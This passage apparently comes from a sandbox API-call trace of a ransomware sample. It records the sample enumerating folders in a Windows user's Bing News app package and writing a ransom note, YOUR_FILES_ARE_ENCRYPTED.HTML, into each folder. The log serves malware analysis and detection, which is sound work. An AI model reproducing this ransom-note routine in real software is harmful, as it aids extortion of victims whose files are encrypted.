pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\Temp") returned 89 [0115.209] GetProcessHeap () returned 0x600000 [0115.209] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.211] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\Temp" [0115.211] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\Temp\\*" [0115.211] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.212] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0115.212] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0115.212] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.212] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0115.212] GetProcessHeap () returned 0x600000 [0115.212] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.213] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.215] CloseHandle (hObject=0x324) returned 1 [0115.215] GetProcessHeap () returned 0x600000 [0115.215] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.215] GetProcessHeap () returned 0x600000 [0115.215] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.215] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="Temp", cAlternateFileName="")) returned 0 [0115.215] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.215] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0115.215] GetProcessHeap () returned 0x600000 [0115.215] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.216] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.217] CloseHandle (hObject=0x214) returned 1 [0115.217] GetProcessHeap () returned 0x600000 [0115.217] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.218] GetProcessHeap () returned 0x600000 [0115.218] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.219] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0115.219] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.219] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AppData") returned 89 [0115.219] GetProcessHeap () returned 0x600000 [0115.219] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.220] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AppData" [0115.220] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AppData\\*" [0115.221] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.221] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.221] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0115.221] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.221] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0115.222] GetProcessHeap () returned 0x600000 [0115.222] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.223] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.224] CloseHandle (hObject=0x214) returned 1 [0115.224] GetProcessHeap () returned 0x600000 [0115.224] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.224] GetProcessHeap () returned 0x600000 [0115.225] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.225] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0115.225] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.225] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalCache") returned 92 [0115.225] GetProcessHeap () returned 0x600000 [0115.225] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.225] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalCache" [0115.225] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalCache\\*" [0115.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.225] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.225] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0115.225] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.225] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0115.225] GetProcessHeap () returned 0x600000 [0115.225] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.226] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.228] CloseHandle (hObject=0x214) returned 1 [0115.228] GetProcessHeap () returned 0x600000 [0115.228] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.228] GetProcessHeap () returned 0x600000 [0115.228] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.228] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0115.228] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.228] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalState") returned 92 [0115.228] GetProcessHeap () returned 0x600000 [0115.228] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.228] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalState" [0115.228] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalState\\*" [0115.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.229] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.229] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0115.229] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.229] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0115.229] GetProcessHeap () returned 0x600000 [0115.229] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.230] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.231] CloseHandle (hObject=0x214) returned 1 [0115.231] GetProcessHeap () returned 0x600000 [0115.231] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.231] GetProcessHeap () returned 0x600000 [0115.231] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.232] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ec6c618, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ec6c618, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ec6c618, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0115.232] StrStrIW (lpFirst="Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.232] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe") returned 129 [0115.232] GetProcessHeap () returned 0x600000 [0115.232] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.233] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe" [0115.233] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\*" [0115.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ec6c618, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ec6c618, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ec6c618, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.234] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: 